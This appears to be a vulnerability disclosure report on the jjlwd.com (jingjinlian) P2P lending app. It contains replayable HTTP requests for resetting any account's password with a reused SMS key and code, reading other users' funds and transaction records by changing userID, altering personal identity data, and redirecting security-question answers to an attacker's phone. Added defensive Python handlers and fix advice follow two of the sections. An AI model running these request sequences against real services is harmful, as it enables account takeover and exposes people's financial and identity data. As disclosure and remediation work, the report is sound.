P2P financial security: multiple design defects, such as password reset at jingjinlian (verification and repair are required)
Packed
http://android.myapp.com/myapp/detail.htm?apkName=com.jjl
Updated on: version 1.0.2, 2016.3.17
Download and install the APP
1. Password Reset
Use the registration function to send a verification code to your own mobile phone.
Write down the body returned by the interface together with the verification code received by the phone.
For example
randomCode: kGAMCEZ0UFw= (corresponding verification code: 784204)
Start a password reset for 13333333333, send the verification code, fill in the form, and submit it to capture the interface request.
Splice the information noted above into that request.
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 155
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAAFLlt1sUHwgAzuXkesMh7BsNROmw
User-Agent: okhttp/2.1.0

sign=token&verification_code=our verification code&functionType=4&phone_key=l1I%token%3D%3D&auth=jjlwd&info=2015&sms_key=Our randomCode&new_passwd=123123&mobile=13333333333
Submission result
Modified successfully
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 199
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0

sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&verification_code=784204&functionType=4&phone_key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&info=2015&sms_key=kGAMCEZ0UFw%3D&new_passwd=123123&mobile=13333333333
You can save this request so that you do not need to send a verification code the next time. (PS: the request content can be copied for the password reset.)
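The root cause in this section is that the server accepts any (sms_key, verification code) pair it ever issued, regardless of which mobile number the pair was sent to, and that the response body leaks the pairing material. The following is an added example, not code from the page or from the jjlwd.com application, of how a server-side handler for the functionType=4 form fields can be written so that the pair is bound to one mobile number and one purpose, is single-use, expires, and is never returned to the client. The field names (sms_key, verification_code, mobile, new_passwd) are taken from the request on the page; the account store, TTL and attempt limit are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300   # assumption: a 5-minute code lifetime
MAX_ATTEMPTS = 5         # assumption: five guesses per challenge

# Constructed in-memory stores standing in for the server's database/cache.
PENDING = {}                                      # sms_key -> challenge record
ACCOUNTS = {"13800000000": {"password": "old"}}   # constructed sample account


def _digest(sms_key: str, code: str) -> str:
    # Hash the code together with its handle so a stored digest is only useful
    # for the one challenge it belongs to.
    return hashlib.sha256(f"{sms_key}:{code}".encode()).hexdigest()


def issue_code(mobile: str, purpose: str, now=None) -> dict:
    """Create a challenge bound to one mobile number and one purpose.

    Returns two things the server must keep apart: what the HTTP response may
    carry (the opaque sms_key only) and what goes to the SMS gateway (the code).
    """
    now = time.time() if now is None else now
    code = f"{secrets.randbelow(10**6):06d}"
    sms_key = secrets.token_urlsafe(16)
    PENDING[sms_key] = {
        "mobile": mobile,
        "purpose": purpose,
        "digest": _digest(sms_key, code),
        "expires": now + CODE_TTL_SECONDS,
        "attempts": 0,
    }
    return {"response": {"sms_key": sms_key}, "sms_gateway": (mobile, code)}


def verify_code(sms_key, mobile, purpose, code, now=None):
    """Check a code. The reason string is for server logs only; the client
    should see nothing more specific than success or failure."""
    now = time.time() if now is None else now
    entry = PENDING.get(sms_key)
    if entry is None:
        return False, "unknown or already used sms_key"
    if now > entry["expires"]:
        del PENDING[sms_key]
        return False, "expired"
    entry["attempts"] += 1
    if entry["attempts"] > MAX_ATTEMPTS:
        del PENDING[sms_key]
        return False, "too many attempts"
    # The binding the page says is missing: the pair is only valid for the
    # mobile number and the flow it was issued for.
    if entry["mobile"] != mobile or entry["purpose"] != purpose:
        return False, "sms_key not issued for this mobile/purpose"
    if not hmac.compare_digest(entry["digest"], _digest(sms_key, code)):
        return False, "wrong code"
    del PENDING[sms_key]   # single use: a replayed pair must fail
    return True, "ok"


def reset_password(form: dict, now=None) -> bool:
    """Handler for the functionType=4 form fields seen on the page."""
    ok, _reason = verify_code(form.get("sms_key"), form.get("mobile"),
                              "reset_password", form.get("verification_code"), now)
    if not ok or form.get("mobile") not in ACCOUNTS:
        return False
    # A real system stores a password hash; the plain value is kept here only
    # so the constructed example is easy to inspect.
    ACCOUNTS[form["mobile"]]["password"] = form["new_passwd"]
    return True
```

The same `verify_code` with purpose `"modify_profile"` covers the personal-data form in section 3: a pair issued for the reset flow cannot be reused there, and a pair issued for one number cannot authorize a change on another.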
2. Information Leakage
Log in (the token is not actually checked, nor is the session; the uid is a plain number, so unauthorized access to other accounts can be run in bulk).
The account fund information query interface allows viewing other accounts' funds without authorization (accounts can be looked up).
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 118
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0

userID=11888&functionType=40&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d
Historical earnings query interface, also accessible without authorization
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 145
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0

userID=11888&functionType=10&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d&page_count=10&page_index=1
Income and expenditure details query interface, also accessible without authorization
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 213
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAALMzDlBkpQsAlA+I3VOca5JqHm2N
User-Agent: okhttp/2.1.0

functionType=41&userID=11888&token=ECB1F97F4D805FE25e67ff2d&page_index=1&page_count=1000&startTime=2016-03-01+00%3A00%3A00&endTime=2016-03-31+23%3A59%3A59&auth=jjlwd&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29
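All three requests above carry the caller's identity in a client-supplied userID, and the page states that the token and session are not checked against it. The fix is the same for every functionType: resolve the user from the server-side session behind the token and ignore the body's userID except as a detection signal. The following is an added example, not code from the page or from the jjlwd.com application, of a small dispatcher for functionType 40 and 41 written that way. The parameter names (token, userID, functionType, page_index, page_count, startTime, endTime) come from the requests on the page; the session table, fund balances and ledger rows are constructed sample data, and the `ALERTS` list stands in for whatever a real deployment would forward to its log pipeline.

```python
import logging

log = logging.getLogger("appService")

# Constructed sample data standing in for the real session store and database.
SESSIONS = {
    "tok-alice-constructed": 11888,
    "tok-bob-constructed": 11889,
}
FUNDS = {
    11888: {"available": "1000.00", "frozen": "0.00"},
    11889: {"available": "250.50", "frozen": "10.00"},
}
LEDGER = [  # (owner userID, date, amount, memo) -- constructed rows
    (11888, "2016-03-02", "+12.30", "interest"),
    (11889, "2016-03-05", "-100.00", "withdrawal"),
    (11888, "2016-03-20", "+8.10", "interest"),
]
ALERTS = []  # userID mismatches are recorded here for a SIEM rule (or a test) to read


class AuthError(Exception):
    pass


def resolve_user(form: dict) -> int:
    """Identity comes from the server-side session behind `token`, never from
    the client-supplied userID field."""
    uid = SESSIONS.get(form.get("token", ""))
    if uid is None:
        raise AuthError("missing or invalid token")
    claimed = form.get("userID")
    if claimed is not None and str(claimed) != str(uid):
        # Detection hook: a body userID that disagrees with the session is the
        # signature of the horizontal access described above. Serve the
        # session user's own data and record the attempt.
        ALERTS.append({"session_uid": uid, "claimed_uid": claimed,
                       "functionType": form.get("functionType")})
        log.warning("userID mismatch: session=%s body=%s", uid, claimed)
    return uid


def query_funds(form: dict) -> dict:
    """functionType=40: account funds for the authenticated user only."""
    uid = resolve_user(form)
    return {"userID": uid, **FUNDS[uid]}


def query_ledger(form: dict) -> list:
    """functionType=41: income/expense rows filtered by owner first, then by
    date window, then paged. Ownership is applied before any other filter."""
    uid = resolve_user(form)
    start = form.get("startTime", "0000-00-00")[:10]
    end = form.get("endTime", "9999-12-31")[:10]
    rows = [r for r in LEDGER if r[0] == uid and start <= r[1] <= end]
    index = int(form.get("page_index", 1))
    count = int(form.get("page_count", 10))
    return rows[(index - 1) * count: index * count]


HANDLERS = {"40": query_funds, "41": query_ledger}


def app_service(form: dict):
    """Entry point standing in for /mobile/appService.do."""
    handler = HANDLERS.get(str(form.get("functionType")))
    if handler is None:
        return {"error": "unknown functionType"}
    try:
        return handler(form)
    except AuthError as exc:
        return {"error": str(exc)}
```

The same rule applies to the password-protection flow in section 4: the destination mobile number for an SMS belongs to the account record on the server, not to a field in the request.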
3. Personal data modification
The APP also has a function:
the personal data form.
If the name and ID card have not been verified, the verification code alone decides whether the personal data may be modified. The verification code can therefore be bypassed in the same way as in the password reset, and the personal data can be changed.
For example
Modification interface
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 262
Host: www.jjlwd.com
Connection: Keep-Alive
Accept-Encoding: gzip
Cookie: aliyungf_tc=AQAAACQyGS1J7AwAlQ+I3bDjJoCyaq8V
User-Agent: okhttp/2.1.0

sms_key=kGAMCEZ0UFw%3D&verification_code=784204&realName=%E4%BB%80%E4%B9%88%E9%AC%BC&userID=11888&functionType=13&key=l1I%2FC01zZlj6GOhTk5KWcQ%3D%3D&auth=jjlwd&idNo=513228198401237858&info=2015&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&token=ECB1F97F4D805FE25e67ff2d
Change the verification code and randomCode.
Upon login, the server returns the user's ID card number and name.
Before modification:
After modification:
A further serious point: this interface also takes a uid and is likewise open to unauthorized access, so running it through Burp in bulk would be devastating (I did not dare to try).
4. Obtaining the password protection answer on the official website, which allows the password protection answer to be modified
Other defects on the official website
Official website login
If you forget the answer to the password protection question, the answer can be sent to any mobile phone number.
Click [Forgot password protection? Send to mobile phone]. Capture the packet and modify the mobile phone number.
Check the text message on your own phone,
enter the answer to the question, and pass the security questions.
That is all.
Solution:
Strengthen verification and fix the unauthorized access.
Do not return the verification code (or its randomCode) in the response.
Bind the verification code to the mobile phone number.
Bind the account to its mobile phone number.
Requesting 20R.